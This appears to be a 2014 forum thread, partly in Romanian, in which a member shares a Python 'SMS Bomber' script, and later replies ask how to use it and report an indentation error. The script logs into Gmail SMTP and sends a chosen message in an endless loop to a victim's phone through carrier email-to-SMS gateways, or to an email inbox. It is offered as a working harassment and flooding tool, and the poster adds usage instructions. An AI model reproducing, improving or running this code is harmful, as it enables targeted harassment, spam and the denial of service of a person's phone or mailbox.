Htich Posted January 21, 2014 Report Share Posted January 21, 2014 # Name: smsbomber.py# Coded by Cody from r00tsecurity.org# Released exclusively to r00tsecurity.org# Feel free to repost, leave credit in tact.import smtplib as sprint"\n\r\n\rCody's SMS Bomber \n\r"print"\n\r\n\rPlease login with your Gmail account \n\r"username = raw_input("Gmail Username: ") password = raw_input("Gmail Password: ") obj = s.SMTP("smtp.gmail.com:587")obj.starttls()obj.login(username, password)print"\n\r"print """ What kind of bomb would you like to send?1. SMS2. Email """option = input() print("\n\r")if option == 1: carrier_attack = 0 print """ What is their carrier? Respond with the corresponding number 1. Alltel 2. AT&T 3. Rogers 4. Sprint 5. T-Mobile 6. Telus 7. Verizon 8. Virgin Mobile 9. Orange \n\r""" carrier = input() if carrier == 1: carrier_attack = "@alltelmessage.com" if carrier == 2: carrier_attack = "@txt.att.net" if carrier == 3: carrier_attack = "@pcs.rogers.com" if carrier == 4: carrier_attack = "@messaging.sprintpcs.com" if carrier == 5: carrier_attack = "@tmomail.net" if carrier == 6: carrier_attack = "@msg.telus.com" if carrier == 7: carrier_attack = "@vtext.com" if carrier == 8: carrier_attack = "@vmobl.com" if carrier == 9: carrier_attack = "@sms.orange.pl" v_phone = raw_input("Phone Number: ") + str(carrier_attack) message = raw_input("Message: ") phone_message = ("From: %s\r\nTo: %s \r\n\r\n %s" % (username, "" .join(v_phone), "" .join(message))) while 1: obj.sendmail(username, v_phone, phone_message) print "Message sent! Sending another.. Press Ctrl + C to stop."if option == 2: v_email = raw_input("Email: ") message = raw_input("Message: ") email_message = (" \r\n\r\n From: %s\r\n To: %s\r\n\r\n %s" % (username, "" .join(v_email), "" .join(message))) while 1: obj.sendmail(username, v_email, email_message) print "Message sent! Sending another.. Press Ctrl + C to stop." Quote Link to comment Share on other sites More sharing options...
lauryca Posted January 21, 2014 Report Share Posted January 21, 2014 Ceva instructiuni ? Quote Link to comment Share on other sites More sharing options...
Htich Posted January 23, 2014 Author Report Share Posted January 23, 2014 1) folosesti in python sursa.2 ) iti trebuie un cont de g-mail sau modifica servarul de smtp ( login,pass ,ip )Imi zici daca ai reusit ! Quote Link to comment Share on other sites More sharing options...
catutz Posted January 25, 2014 Report Share Posted January 25, 2014 fjfghdfs Quote Link to comment Share on other sites More sharing options...
bozzmann Posted January 27, 2014 Report Share Posted January 27, 2014 1) folosesti in python sursa.2 ) iti trebuie un cont de g-mail sau modifica servarul de smtp ( login,pass ,ip )Imi zici daca ai reusit !How can one use this? i think this will be very useful. Please can u provide a full tutorial on how to use this? Quote Link to comment Share on other sites More sharing options...
Active Members Fi8sVrs Posted January 27, 2014 Active Members Report Share Posted January 27, 2014 root@root:~# clearroot@root:~# nano sms.pyroot@root:~# python sms.py File "sms.py", line 45 carrier_attack = "@alltelmessage.com" ^IndentationError: expected an indented blockroot@root:~# Quote Link to comment Share on other sites More sharing options...